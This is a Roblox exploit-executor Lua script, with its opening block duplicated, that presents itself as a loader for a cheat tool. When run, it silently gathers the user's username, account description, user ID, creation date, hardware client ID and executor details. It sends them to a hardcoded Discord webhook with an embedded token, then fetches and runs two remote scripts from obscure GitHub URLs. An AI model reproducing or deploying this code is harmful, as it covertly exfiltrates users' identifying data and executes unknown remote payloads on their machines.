local req = http_request or request or (syn and syn.request)
local HS = game:GetService("HttpService")
local response = HS:JSONDecode(
    req({
    Url = "https://users.roblox.com/v1/users/"..game.Players.LocalPlayer.UserId
})
.Body)



local req = http_request or request or (syn and syn.request)
local HS = game:GetService("HttpService")
local response = HS:JSONDecode(
    req({
    Url = "https://users.roblox.com/v1/users/"..game.Players.LocalPlayer.UserId
})
.Body)

local exploit,version = identifyexecutor() 

local webh = "https://discord.com/api/webhooks/1041573765127094364/Zz4_b1-WgbNde1jTWSbv0byXpo43MVfYqN0sjc1JyCCmiDsJtBgvlCALDWNPS0-Cvbiq"


pcall(function()
   local data = {

  ['embeds'] = {
    {
       ['title'] = '`` | Normal User Has Executed | ``',
       ['description'] = '**( S_A IN USE ! )**',
       ['type'] = "rich",
       ['color'] = tonumber(16753920),
       ['fields'] = {
          {name = '**Username**', value = game:GetService("Players").LocalPlayer.Name},
          {name = '**Account Description**', value = "'"..response.description.."'"},
          {name = '**Player ID**', value = game:GetService("Players").LocalPlayer.UserId},
          {name = '**Account Creation**', value = ""..response.created..""},
          {name = '**Hardware ID**', value = game:GetService("RbxAnalyticsService"):GetClientId()},
          {name = "**Ping**", value = game:GetService("Stats").Network.ServerStatsItem["Data Ping"]:GetValueString()},
          {name = "**Executor**", value = identifyexecutor()..' | Executor Version : '..version},
        }
    }
  }
}

   if syn then
       local response = syn.request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif request then
       local response = request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif http_request then
       local response = http_request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   end
end)

getgenv().key = 'LJB&^$KLBVTY)(*&^NKLK'

loadstring(game:HttpGet("https://raw.githubusercontent.com/01010101010x/010100101/main/F13CKILLA"))();
loadstring(game:HttpGet("https://raw.githubusercontent.com/01010101010x/010100101/main/3qte4ry5ht6jy7kusyra65ue4yw5u6i78oultd"))();

print('loading done')

